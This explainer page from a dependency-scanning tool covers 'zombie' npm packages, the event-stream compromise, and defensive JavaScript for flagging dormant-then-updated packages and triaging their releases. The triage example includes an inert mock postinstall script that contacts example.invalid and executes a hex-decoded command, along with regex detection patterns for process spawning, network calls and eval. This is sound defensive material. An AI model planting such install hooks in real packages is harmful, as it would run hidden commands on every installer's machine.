Zombie Package

npm · supply chain
Definition

A zombie package is an informal term for an open source package that went quiet for an extended period (months to years with no updates) and then unexpectedly published a new version. This pattern is a known indicator of a possibly compromised maintainer account: an attacker gains access, publishes a malicious update, and relies on the package's existing install base to spread the payload, helped along by the caret ranges in dependents' manifests that pull the new version in on the next install.

Why dormancy followed by activity is suspicious

Legitimate maintainers tend to follow predictable patterns: regular releases, changelogs, GitHub activity. When a package goes completely silent for over a year and then suddenly releases a new version, one of a few things is happening: the maintainer came back, the project was abandoned and then revived, or someone else now has access to the account.

Attackers specifically target dormant packages because they have established trust: hundreds of thousands of weekly downloads, no recent scrutiny, and maintainers who may not even be monitoring the account anymore. That is a much easier target than a recently updated popular package whose active maintainers would notice an unexpected release.

The event-stream attack — the original zombie

In 2018, the npm package event-stream had over 2 million weekly downloads. The original maintainer handed it off to a stranger, known only by a GitHub handle, who seemed trustworthy. The new maintainer added a dependency called flatmap-stream whose published tarball contained malicious code targeting Copay, a specific Bitcoin wallet application; the payload was present only in the registry artifact, not in the project's GitHub repository. The attack ran undetected for about 2.5 months before a developer noticed a deprecation warning coming from the dependency and looked closer.

Variants of this pattern have recurred since. The attacker doesn't even need to hack anything: they just ask to take over an abandoned package and the original maintainer says yes.

How PackageFix detects zombie packages

PackageFix fetches the npm registry's publish history for each package. A package is flagged with a 🧟 ZOMBIE badge when all three of the following hold: it had no release for more than 24 months (measured from the previous version's publish timestamp), it then published a new version within the last 72 hours, and it has more than 100,000 weekly downloads. The badge reads, for example: "Updated 4 hours ago after 2+ years of inactivity — may indicate compromised maintainer account."
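One way to implement that check over the registry's public metadata, as an added example that is not PackageFix's own code: the `time` map in `https://registry.npmjs.org/<name>` carries a publish timestamp per version, and `https://api.npmjs.org/downloads/point/last-week/<name>` returns last week's download count. The package name, timestamps and download figure below are constructed sample data; the thresholds are the ones stated above, with months approximated as 30 days.

```javascript
// Zombie-package heuristic over npm registry metadata.
// Added example, not PackageFix's implementation. Thresholds follow the page text;
// "24 months" is approximated as 720 days. Sample data below is constructed.

const HOUR_MS = 60 * 60 * 1000;
const DAY_MS = 24 * HOUR_MS;

const DEFAULT_THRESHOLDS = {
  dormantDays: 24 * 30,       // more than 24 months with no release
  recentHours: 72,            // new version published within the last 72 hours
  minWeeklyDownloads: 100000  // only large install bases are worth the noise
};

// The registry document's `time` map has one ISO timestamp per published version,
// plus `created` / `modified` bookkeeping keys (and possibly an `unpublished` entry)
// that must be ignored. Keep only keys that look like versions.
function publishTimeline(meta) {
  return Object.entries(meta.time || {})
    .filter(([key]) => /^\d+\.\d+\.\d+/.test(key))
    .map(([version, iso]) => ({ version, at: new Date(iso) }))
    .filter(({ at }) => !Number.isNaN(at.getTime()))
    .sort((a, b) => a.at - b.at);
}

function assessZombie(meta, weeklyDownloads, now = new Date(), t = DEFAULT_THRESHOLDS) {
  const timeline = publishTimeline(meta);
  if (timeline.length < 2) {
    return { zombie: false, reason: 'fewer than two releases; no dormancy gap to measure' };
  }
  const latest = timeline[timeline.length - 1];
  const previous = timeline[timeline.length - 2];
  // Dormancy is the gap between the two most recent publishes, not the package's age.
  const gapDays = (latest.at - previous.at) / DAY_MS;
  const ageHours = (now - latest.at) / HOUR_MS;
  const checks = {
    dormant: gapDays > t.dormantDays,
    recent: ageHours >= 0 && ageHours <= t.recentHours,
    popular: weeklyDownloads > t.minWeeklyDownloads
  };
  const zombie = checks.dormant && checks.recent && checks.popular;
  return {
    zombie,
    name: meta.name,
    previous: previous.version,
    latest: latest.version,
    gapDays: Math.round(gapDays),
    ageHours: Math.round(ageHours),
    weeklyDownloads,
    checks,
    badge: zombie
      ? `🧟 ZOMBIE: updated ${Math.round(ageHours)} hours ago after ${Math.round(gapDays / 30)} months of inactivity`
      : null
  };
}

// Live lookup (Node 18+ global fetch). Not used by the offline sample below.
async function fetchRegistryInputs(name) {
  const metaRes = await fetch(`https://registry.npmjs.org/${encodeURIComponent(name)}`);
  const dlRes = await fetch(`https://api.npmjs.org/downloads/point/last-week/${name}`);
  if (!metaRes.ok || !dlRes.ok) throw new Error(`registry lookup failed for ${name}`);
  const meta = await metaRes.json();
  const { downloads } = await dlRes.json();
  return { meta, downloads };
}

// Constructed sample: four releases, the last one about 30 months after the
// previous and four hours before the evaluation time.
const SAMPLE_META = {
  name: 'example-dormant-lib',
  time: {
    created: '2019-01-10T12:00:00.000Z',
    modified: '2024-03-02T09:00:00.000Z',
    '1.0.0': '2019-01-10T12:00:00.000Z',
    '1.1.0': '2019-06-01T12:00:00.000Z',
    '1.2.0': '2021-09-15T08:30:00.000Z',
    '1.2.1': '2024-03-02T09:00:00.000Z'
  }
};
const SAMPLE_WEEKLY_DOWNLOADS = 240000;
const SAMPLE_NOW = new Date('2024-03-02T13:00:00.000Z');

console.log(JSON.stringify(assessZombie(SAMPLE_META, SAMPLE_WEEKLY_DOWNLOADS, SAMPLE_NOW), null, 2));
```

Measuring the gap between the two most recent publishes, rather than from the package's creation date, is what distinguishes a revived package from one that has simply been releasing slowly; the same metadata also lets you skip flagging a package whose previous release was a prerelease tag, if that suits your noise budget.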

Check your dependencies for CVEs, CISA KEV entries, and supply chain risks.

Open PackageFix →

Free · No signup · No CLI · Runs in your browser

Common questions

Should I avoid all packages that haven't been updated recently?
Not necessarily. Some packages are simply stable and don't need updates. The concern is specifically the combination of long dormancy followed by a sudden update, especially in packages with large install bases. A package that hasn't been updated in 2 years and isn't about to be is lower risk on this axis than one that just got its first update in 2 years, though an unmaintained package carries a different risk: nobody is around to fix a vulnerability reported against it.
Is there a registry-level protection against zombie package attacks?
npm and PyPI have implemented some protections: 2FA requirements (for high-impact packages on npm, for all uploaders on PyPI), email notifications on publishes, and build provenance (npm provenance, PyPI Trusted Publishers) that lets consumers verify a release was built and published from the project's CI rather than from a maintainer's laptop. But they can't prevent every case. Provenance only helps for projects that publish that way, a compromised CI pipeline still produces a release with valid provenance, and a legitimate maintainer account that gets phished isn't something a registry can automatically detect.
What should I do if PackageFix flags a zombie package?
Don't upgrade to the new version until you've reviewed the changes, and make sure your lockfile (package-lock.json, yarn.lock, pnpm-lock.yaml) is pinning what you already have so a caret range doesn't pull the new version in on the next install. Check the package's GitHub repo for the release notes, review the actual code diff, and look for discussion in the issues. Review the published tarball rather than only the repository: `npm pack <name>@<version>` downloads exactly what the registry serves, and that artifact can contain code that never appeared in the repo, as the flatmap-stream payload did. If the new version adds new dependencies, install-time scripts (preinstall/postinstall), network calls, or shell commands, be very cautious.
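A mechanical first pass over a flagged release, as an added example that is not PackageFix's code: it compares the old and new `package.json` manifests for newly added dependencies and install-time lifecycle scripts, then scans the new version's files for process spawning, network access, dynamic code evaluation, and hex/base64 decoding, the kinds of additions the answer above says to be cautious about. The manifests and file contents below are constructed samples and the dependency name `example-helper-stream` is hypothetical. In practice, feed it the files extracted from the registry tarball (`npm pack <name>@<version>`), since that is what gets installed.

```javascript
// Triage checks for a release that appeared after long dormancy.
// Added example, not PackageFix's code. Inputs: the previous and new package.json
// objects and a { path: source } map of the NEW published tarball's files.
// The manifests and files below are constructed samples; the dependency name
// example-helper-stream is hypothetical.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Textual indicators worth a human look. Plain regexes, so minified or obfuscated
// code can evade them; no hits is not a clean bill of health.
const RISKY_PATTERNS = [
  { pattern: 'child_process', re: /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/ },
  { pattern: 'network', re: /require\(\s*['"](?:https?|net|dns|dgram|tls)['"]\s*\)|\bfetch\s*\(/ },
  { pattern: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/ },
  { pattern: 'hex-or-base64-decode', re: /Buffer\.from\s*\([^)]*['"](?:hex|base64)['"]\s*\)/ }
];

// Dependencies that are new in the new manifest, or whose version range changed.
function addedOrChangedDeps(oldPkg, newPkg) {
  const before = oldPkg.dependencies || {};
  const after = newPkg.dependencies || {};
  return Object.keys(after).filter((name) => before[name] !== after[name]);
}

// Lifecycle scripts that run during `npm install` and are new or changed in this release.
function newInstallHooks(oldPkg, newPkg) {
  const before = oldPkg.scripts || {};
  const after = newPkg.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => after[hook] && before[hook] !== after[hook])
    .map((hook) => ({ script: hook, command: after[hook] }));
}

// One finding per (file, pattern) pair that matches.
function scanFiles(files) {
  const findings = [];
  for (const [path, source] of Object.entries(files)) {
    for (const { pattern, re } of RISKY_PATTERNS) {
      if (re.test(source)) findings.push({ path, pattern });
    }
  }
  return findings;
}

function triageRelease(oldPkg, newPkg, newFiles) {
  const newDeps = addedOrChangedDeps(oldPkg, newPkg);
  const newScripts = newInstallHooks(oldPkg, newPkg);
  const findings = scanFiles(newFiles);
  return {
    suspicious: newDeps.length > 0 || newScripts.length > 0 || findings.length > 0,
    newDeps,
    newScripts,
    findings
  };
}

// Constructed sample: the dormant release adds a dependency, a postinstall hook,
// and a setup script that spawns a process after a network call. The script is
// inert (example.invalid host, dummy hex); it exists only to exercise the scanner.
const OLD_PKG = {
  name: 'example-dormant-lib', version: '1.2.0',
  dependencies: { once: '^1.4.0' },
  scripts: { test: 'node test.js' }
};
const NEW_PKG = {
  name: 'example-dormant-lib', version: '1.2.1',
  dependencies: { once: '^1.4.0', 'example-helper-stream': '^0.1.1' },
  scripts: { test: 'node test.js', postinstall: 'node scripts/setup.js' }
};
const NEW_FILES = {
  'index.js': [
    'module.exports = function once(fn) {',
    '  let done = false;',
    '  return (...args) => { if (done) return; done = true; return fn(...args); };',
    '};'
  ].join('\n'),
  'scripts/setup.js': [
    "const cp = require('child_process');",
    "const https = require('https');",
    "const cmd = Buffer.from('deadbeef', 'hex').toString();",
    "https.get('https://example.invalid/ping', () => cp.exec(cmd));"
  ].join('\n')
};

console.log(JSON.stringify(triageRelease(OLD_PKG, NEW_PKG, NEW_FILES), null, 2));
```

The install hooks check matters because a postinstall script runs on every machine that installs the package, including CI, before any of the package's code is ever imported; a new hook in a release that follows two years of silence is reason enough to hold the upgrade until someone has read it.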
Does this only apply to npm?
PackageFix checks dormancy patterns for npm, PyPI, and RubyGems. The same attack pattern applies to all ecosystems — any package registry where accounts can be compromised or handed off is potentially affected.
